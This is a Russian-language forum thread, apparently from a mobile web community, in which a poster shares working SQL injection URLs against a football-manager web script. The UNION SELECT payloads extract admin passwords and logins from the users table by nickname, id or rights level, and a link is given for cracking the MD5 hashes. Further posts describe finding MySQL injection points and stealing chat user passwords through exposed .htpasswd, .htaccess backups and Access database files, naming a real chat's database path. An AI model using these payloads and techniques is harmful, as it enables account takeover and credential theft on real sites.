Loading...
| Фут.менеджер
http://адрес сайта/man/table.php?act=sc&land=eu%'+union+select+1,2,3,4,5,password,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,
21,22,23,24,25,26,27,28,29,30,
31,32+from+users+where+name+like+'%Ник админа

Также можно и по id http://адрес сайта/man/table.php?act=sc&land=eu%'+union+select+1,2,3,4,5,password,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,
21,22,23,24,25,26,27,28,29,30,
31,32+from+users+where+id+like+'%id юзера

И даже по правам http://адрес сайта/man/table.php?act=sc&land=eu%'+union+select+1,2,3,4,5,password,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,
21,22,23,24,25,26,27,28,29,30,
31,32+from+users+where+rights+like+'%9 // в данном случае выведется пароль первого SV!

Как узнать логин? http://адрес сайта/man/table.php?act=sc&land=eu%'+union+select+1,2,3,4,5,name_lat,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,
21,22,23,24,25,26,27,28,29,30,
31,32+from+users+where+name+like+'%Ник админа Можно также по правам и по id

Ещё можно ломать и так:
http://Адрес сайта/man/index.php?act=en%'+union+select+1,2,password,4,5+from+users+where+name+like+'%ник-админа

http://md5.darkbyte.ru/ (Этим расшифровывать хеш)
бан тебе
cara, :DШутник:D
Эта тема несет в себе скрытый смысл?
Посвещай всех.
TheDisar,Нет нечего скрытого:DЗавтра еще выложу:)Анонимы дали добро;)
Как обнаружить MySQL-injection? Ничего сложного в этом нет, вот допустим есть у нас сайт http://primersait.ru в нем присутствуют страницы http://primersait.ru/?user=1 . На примере видно что передается параметр user равный 1. Подставим в значения параметра ' (http://primersait.ru/?user=1&#039 ; ) отправим запрос на сервер. Если мы увидим ошибку mysql радуемся уязвимость есть.
Существует несколько способов простого хищения паролей из чатов. Если чат расположен на сервере apache, и проверяет имена пользователей по файлу htpasswd (при этом ваш браузер выкидывает окошко с предложением ввести имя и пароль для доступа к ресурсу), то всегда есть вероятность, что нерадивые администраторы положили его в доступный каталог. Можно для этого воспользоваться URL типа http://www.somechat.com/chat/ . ... очное расположение файла можно узнать стянув файл.htaccess из данной директории. Это, обычно не удается. Но часто удается стянуть его копию, которая осталась с последнего редактирования файла, например http://www.somechat.com/chat/.htaccess или http://www.somechat.com/chat/ . ... s.old (в том случае, если копии этих файлов любезно оставлены администратором).Если чат расположен на Микрософтовском сервере и использует ODBC для доступа к базе данных паролей, то можно попытаться стянуть файл с базой, например если она имеет формат Microsoft Access и хранится в том же каталоге, то достаточно просто угадать ее имя, чтобы получить полную информацию обо всех пользователях вместе с паролями Классический пример - чат "Пластилин"(я уже послал уведомление администраторам чата): http://www.plastilin.nnov.ru/talkzone/ta lkzone.mdb Следует сразу заметить, что почти все сказанное выше справедливо не только для HTML- чатов, но и для других WEB-сервисов, таких как доски объявлений (WWW-boards) или гостевые книжки.
Ставим + В анкете иначи не выложу больше нечего:)
Онлайн: 2
Время:
Gen. 0.1058
(c) ByMAS.RU 2010-2025